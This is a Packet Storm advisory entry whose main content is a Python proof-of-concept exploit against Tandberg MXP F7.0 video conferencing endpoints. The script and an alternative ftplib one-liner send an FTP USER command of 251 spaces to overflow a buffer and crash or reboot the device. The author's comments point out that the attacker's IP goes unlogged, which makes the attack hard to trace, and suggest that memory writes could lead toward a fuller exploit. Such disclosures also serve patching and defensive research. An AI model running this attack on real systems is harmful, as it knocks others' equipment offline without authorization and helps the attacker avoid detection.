Tandberg MXP F7.0 Buffer Overflow

2009-07-13T00:00:00
ID PACKETSTORM:79133
Type packetstorm
Reporter otokoyama
Modified 2009-07-13T00:00:00

Description

                                        
                                            `#########################################################################################  
# #  
# TANDBERG BoF v0.1 - Tandberg MXP F7.0< #  
# Buffer Overflow Vulnerability PoC #  
# By otokoyama #  
# #  
# [+] We crash the process FtpCt00 by sending a 251 char string of /x20 commonly #  
# known as a blank space.(very simple) #  
# [+] The BOF happens due to the system passing all usernames:passwords to a log file. #  
# #  
# [+] Vendor has fixed THIS in the later releases of its firmware so it is now public. #  
# #  
# #  
# This is a good vuln due to the system not logging the IP address of the attacker. #  
# To be able to tell who was causing this you would need to grab a log from the FW #  
# and as TANDBERG does not provide timestamps on their endpoints pre f8.0 #  
# you would need to have recieved a SNMP notification to TMS that the system rebooted #  
# and cross reference that with the IP's connecting through the firewall. #  
# This is particularily annoying due to the fact that systems reboot all the time #  
# As endusers are constantly turning them on\off #  
# At this point the sysadmin goes "TANDBERG Can we buy an Expressway?" #  
# #  
# As far as it goes, creating a connectback shell would be difficult #  
# this is mainly due to the process on the Endpoint that detects a memory mismatch #  
# and subsequently reboots the system(security measure). #  
# #  
# To create a successfull exploit outside of the DoS #  
# you would need to locate the memory address of the process that reboots the system #  
# (there might even be a fallback on that) This is generally too cumbersome as #  
# this embeded system doesn't do anything fun anyway (why would you want access) #  
# #  
# In saying that, #  
# it would be fairly trivial to use the BoF to write something to the memory. #  
# you will notice buffer below only generates the exception 0x0200 aka Machine Check. #  
# Increasing the char sent to the unit will change that error to exception 0x1100 #  
# meaning we are sending the MINIMUM required length to overflow the buffer. #  
# I have done the hardwork for you! Please email me if you get some encodes. #  
# BTW, This could be done like this: #  
# from ftplib import FTP #  
# ftp = FTP('ip.addr') #  
# ftp.login(' '*251) #  
# ftp.quit()....but its dirty. #  
# #   
# shoutouts:mabus,gso #  
#########################################################################################  
  
import socket  
import struct  
import time  
import sys  
  
  
buff='USER '+' '*251+'\r\n'  
  
if len(sys.argv)!=3:  
print "\n[+] Usage: %s <ip> <port>"%sys.argv[0]  
print "[-] Example: python poc.py 192.168.1.23 23\n"   
sys.exit(0)  
  
try:  
  
print "[+] Connecting... %s" %sys.argv[1]  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
connect=s.connect((sys.argv[1],int(sys.argv[2])))  
print "[+] Sending data..."  
time.sleep(1.2)  
s.send(buff)  
print "[+] Deed Done"  
s.recv(1024)  
  
except:  
print "[#] Unable to connect"  
  
`